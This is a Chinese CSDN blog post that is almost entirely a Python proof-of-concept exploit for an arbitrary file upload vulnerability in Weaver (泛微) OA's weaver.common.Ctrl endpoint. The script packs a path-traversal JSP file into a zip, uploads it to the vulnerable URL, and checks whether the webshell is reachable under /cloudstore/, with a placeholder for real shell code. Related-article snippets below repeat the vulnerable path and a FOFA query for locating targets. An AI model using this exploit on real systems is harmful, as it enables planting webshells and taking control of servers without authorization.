泛微OA weaver.common.Ctrl 任意文件上传漏洞

最新推荐文章于 2024-04-13 06:00:00 发布
最新推荐文章于 2024-04-13 06:00:00 发布
阅读量3.9k 收藏 2
点赞数 2
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DUANYU23/article/details/116942853
版权

poc

import zipfile
import random
import sys
import requests



def generate_random_str(randomlength=16):
  random_str = ''
  base_str = 'ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789'
  length = len(base_str) - 1
  for i in range(randomlength):
    random_str += base_str[random.randint(0, length)]
  return random_str

mm = generate_random_str(8)

webshell_name1 = mm+'.jsp'
webshell_name2 = '../../../'+webshell_name1

def file_zip():
    shell = """测试页面
    """   ## 替换shell内容
    zf = zipfile.ZipFile(mm+'.zip', mode='w', compression=zipfile.ZIP_DEFLATED)
    zf.writestr(webshell_name2, shell)

def GetShell(urllist):
    file_zip()
    print('上传文件中')
    urls = urllist + '/weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp'
    file = [('file1', (mm+'.zip', open(mm + '.zip', 'rb'), 'application/zip'))]
    requests.post(url=urls,files=file,timeout=60, verify=False)
    GetShellurl = urllist+'/cloudstore/'+webshell_name1
    GetShelllist = requests.get(url = GetShellurl)
    if GetShelllist.status_code == 200:
        print('利用成功webshell地址为:'+GetShellurl)
    else:
        print('未找到webshell利用失败')

def main():
    if (len(sys.argv) == 2):
        url = sys.argv[1]
        GetShell(url)
    else:
        print("python3 poc.py http://xx.xx.xx.xx")

if __name__ == '__main__':
    main()
韭菜小白菜
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现】泛微OA e-office webservice 任意文件上传漏洞
qq_67810151的博客
04-25 584
泛微e-office /webservice/upload/upload.php接口存在任意文件上传漏洞。未收取的攻击者可以通过该漏洞上传恶意脚本文件,从而控制服务器。
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)
12-25
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
泛微OA 任意文件上传漏洞
maverickpig的博客
05-26 7159
网络安全自学日志-漏洞复现篇:泛微OA weaver.common.ctrl任意文件上传漏洞 使用需知 由于传播和使用本文所提供的任何直接或间接的后果和损失,均由用户承担,作者对此不承担任何责任。如果文章出现敏感内容产生不良影响,请联系作者删除。 本文来源于PeiQi文库 ,作者PeiQi文库 一、漏洞描述 泛微OA weaver.common.Ctrl 存在任意文件上传漏洞,攻击者通过漏洞可以上传webshell文件控制服务器 二、漏洞影响 泛微OA 三、漏洞复现 逛Github的时候碰巧看见有位师傅公开
[漏洞挖掘]SRC-泛微OA文件上传
wwxxee
05-19 4039
SRC–泛微OA任意文件上传 泛微OA weaver.common.Ctrl 任意文件上传漏洞 存在漏洞的路径为: /weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp 首页: 请求包: FOFA: app=“泛微-协同办公OA” && is_domain=true 普通注册会员只能获取5页信息。 有FOFA会员可以直接通过API请求拿到I
突破防线!泛微OA任意文件上传Getshell
自强不息
08-16 655
子曰:“巧言令色,鲜矣仁。”
【文档留存】泛微OA &&POC
qq_35349673的博客
06-04 1927
sfdafasfasf
Goby 漏洞更新 | Weaver e-cology ofsLogin.jsp 用户登陆绕过漏洞
m0_46699477的博客
05-17 1094
Weaver e-cology ofsLogin.jsp 用户登陆绕过漏洞
Java_OAexp工具设计及实现-Thelostworld_OA
thelostworld
05-02 3294
本文约1700字,阅读约需6分钟。本文主要介绍基于JavaFX图形化界面开发的快速OA类利用工具。笔者收集和整理了目前工具的OA类验证及其利用的方式和方法,整合成一个方便快捷图形化的快速利用工具。想要写这个工具的原因,主要是日常工作中,OA漏洞利用总是需要去找无数验证脚本,操作繁琐。为了方便日常渗透测试,简单快捷地进行OA利用渗透,方便团队提升效率,笔者撰写了这款工具。设计初期,笔者收集和查看了一些师傅所撰写的OA利用相关工具和文章,都是部分漏洞的利用和探测,比较单一。在这个情况下,笔者把现存披露的漏洞利用
EtMi832#PeiQi-WIKI-POC#泛微OA sysinterfacecodeEdit.jsp 页面任意文件上传1
07-25
泛微OA sysinterface/codeEdit.jsp 页面任意文件上传 WooYun-2015-0155705漏洞描述泛微OA sysinterface
saucer-man#wiki#泛微OA sysinterfacecodeEdit.jsp 页面任意文件上传1
07-25
泛微OA sysinterface/codeEdit.jsp 页面任意文件上传 WooYun-2015-0155705漏洞描述泛微OA sysinterface
Silentsoul04#vulnerability-paper-1#泛微OA9前台任意文件上传1
07-25
泛微OA9前台任意文件上传漏洞位于: /page/exportImport/uploadOperation.jsp文件中Jsp流程大概是:判断请求是否是mult
泛微oa开发环境搭建说明.pdf
03-29
泛微OA开发环境的搭建涉及多个步骤,包括软件的安装、配置、以及环境变量的设置。首先,你需要在你的电脑上安装MyEclipse 8.5和SQL Server 2008 R2。MyEclipse的注册信息为:用户名:MyEclipse,注册码:ZLR8ZC-...
漏洞复现-泛微WeaverOA系列
aming小老弟
10-03 1040
泛微OA
漏洞扫描--需要整改的
冰恋云的专栏
07-18 1487
执行未经身份验证的代码。使用用户cookie,代理。中,DataBinder上的disallowedFields模式区分大小写,这意味着除非字段同时列出字段的第一个字符小写,包括属性路径中所有嵌套字段的第一个字符的大写。要创建ptrace关系的进程的凭据记录,这允许本地用户通过利用某些具有父子关系的场景来获得root访问权限进程关系,其中父级放弃特权并调用execve(可。限的经过身份验证的低权限用户都可以与文件管理器功能交互,例如从远程URL下载文件和更改文件权限(chmod)。......
神兵利器 | HW常见OA利用工具(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
04-13 636
常见OA漏洞利用检测工具Tools-1Tools-2Tools-3后台回复tools,获取工具。
泛微ecology9二次开发-附件上传接口
weixin_53964368的博客
10-18 3000
ID为21的附件对应25,26,27;ID为22的附件对应31,32,33,我们可以发现数据库中存储的是其实是id数组。2.接口代码可以复用,只要在调用接口时将对应的文档存储id存储到请求头中就行。最后我这里根据项目组古早的代码中获取了关键信息,代码我就直接贴上来了。这时候我们可以打开数据库管理工具,查看对应数据库中的内容。首先,我们可以在本地环境创建一个仅有附件的表单。我这里的表单对应的是数据库表名uf_fjcs。然后我们再创建对应的模块和查询。1.代码中的dirId为。
漏洞通报:泛微V9任意文件上传
热门推荐
weixin_43526443的博客
12-06 7万+
——D&X安全实验室 目录 Part1 漏洞描述 Part2 危害等级 Part3 漏洞影响 Part4 漏洞分析及验证 (1)环境搭建 (2)构造POC (3)漏洞验证 Part5 修复建议 Part1 漏洞描述 泛微e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案。 该漏洞是由于后端源码中uploadType 参数设为 ...
禅道系统权限绕过与命令执行漏洞分析
C20220511的博客
03-09 1914
权限绕过的关键点在module/common/model.php文件中checkPriv函数,此函数是检查权限的函数,验证当前登陆用户是否有访问module与method的权限。经过代码审计发现captcha函数可以直接写入一个自定义key的session,此段代码本意是设置生成一个自定义session的key的验证码,开发者应该是想写一个公共的验证码生成函数让其他开发者做新功能需要的时候可以直接调用,正好可以利用生成一个key为user的session。后面加上exit();来修复权限绕过漏洞
泛微任意文件上传(CNVD-2021-49104)
不光要学,知识要能说出口
11-30 4950
泛微eoffice任意文件上传漏洞
泛微oa e-cology v9 browser.jsp sql注入漏洞
09-15
泛微OA E-Cology V9是一款常用的企业办公自动化系统,该系统的browser.jsp页面存在SQL注入漏洞。SQL注入是一种常见的网络攻击技术,攻击者可以通过构造恶意的SQL语句来绕过系统的认证和授权机制,进而获取敏感数据或者对系统进行非法操作。 泛微OA E-Cology V9中的browser.jsp页面是用于显示OA系统中的个人文件夹和公共文件夹。攻击者可以在该页面中输入恶意的SQL语句,通过执行这些恶意SQL语句,攻击者可以获取到不应该被访问的数据,比如其他用户的文件,甚至可以对数据库进行修改和损坏。 为了防止SQL注入漏洞的利用,可以采取以下措施: 1. 输入过滤和验证:在服务器端对用户输入的数据进行过滤和验证,去除或转义可能包含恶意SQL代码的字符,确保只接受合法的输入。 2. 使用参数化查询:尽量使用参数化查询代替拼接SQL语句的方式,参数化查询可以预编译SQL语句,避免在拼接时引入恶意代码。 3. 限制数据库用户的权限:对数据库用户进行权限控制,确保每个用户只拥有最小必要的权限,减少攻击者利用SQL注入漏洞进行非法操作的机会。 4. 及时更新和修补漏洞:及时跟进厂商的安全通告并安装最新的补丁程序,确保系统始终处于最新的安全状态。 综上所述,泛微OA E-Cology V9中的browser.jsp页面存在SQL注入漏洞,但通过合理的安全措施和注意事项,我们可以有效地减少该漏洞被利用的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值